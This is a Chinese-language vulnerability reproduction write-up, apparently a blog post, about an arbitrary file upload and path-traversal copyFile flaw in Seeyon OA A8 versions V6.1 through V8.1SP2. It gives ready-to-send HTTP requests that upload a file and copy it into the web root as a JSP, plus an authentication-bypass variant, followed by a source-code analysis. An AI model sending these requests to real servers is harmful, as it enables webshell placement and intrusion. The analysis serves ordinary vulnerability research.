复现版本
V8.0SP2
漏洞范围
V5&G6_V6.1至V8.0SP2全系列版本、V5&G6&N_V8.1至V8.1SP2全系列版本。
漏洞复现
上传文件
POST /seeyon/ajax.do?method=ajaxAction&managerName=portalCssManager&rnd=57507 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 65
Host: 192.168.1.7
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=B8961FAF38CCE07F84676274A672CA37; hostname=192.168.1.7:80; loginPageURL=; login_locale=zh_CN
arguments=%5B%22aaaaa%22%5D&managerMethod=generateCssFileByCssStr
这里结合权限绕过漏洞
也可成功上传
文件复制
POST /seeyon/ajax.do;Jsessionid=a?method=ajaxAction&managerName=cipSynSchemeManager&rnd=29981 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 130
Host: 192.168.1.7
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
arguments=["../../../../resources/portal/css/963501343453105872","../../ApacheJetspeed/webapps/ROOT/2.jsp"]&managerMethod=copyFile
然后访问
http://192.168.1.7/sectestdssd.jsp
漏洞分析
整体利用思路先随便上传一个正常后缀文件, 且知道文件上传的路径和文件名, 再将其复制到WEB路径下,那么先看下面的文件复制,需要上传的一个正常后缀文件,再找上传点
上传点
可以看到portalCssManager的bean存在,那么就可以直接用ajax.do去反射使用了
首先直接找方法名generateCssFileByCssStr
跟入compileString
总体来说,这个方法接收一个SCSS字符串作为输入,将其编译为CSS字符串,并返回编译后的结果。
回到主方法,进入saveFileToUpload方法
这段上传文件,根据传入的fileTypeEnum来获得门户资源文件夹的根目录,如果不存在就创建,那么这里fileTypeEnum为css,那么就是A8\base\resources\portal\css\目录
那么整体看就是在该目录创建css文件
也就是首先用时间创建目录,该时间目录下创建destFile,然后copyFile进行复制,但是这里copyFile和我们下面分析的还不一样,那么接下来分析copyFile怎么进行的复制
copyfile分析
cipSynSchemeManager也有bean,那么也可以调用copyFile方法
这里传入的source和target并未做过滤,从代码逻辑看,对应源文件和目标文件,并且如下
源文件和目标文件都进行了拼接,那么就都可以进行跨目录操作,但是注意这里多了判断,如果目标文件存在,就不会复制生成了,那么每次操作都换个目标文件名就可以
总结
新的文件上传方式,先上传正常后缀文件,在进行copy
2192
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
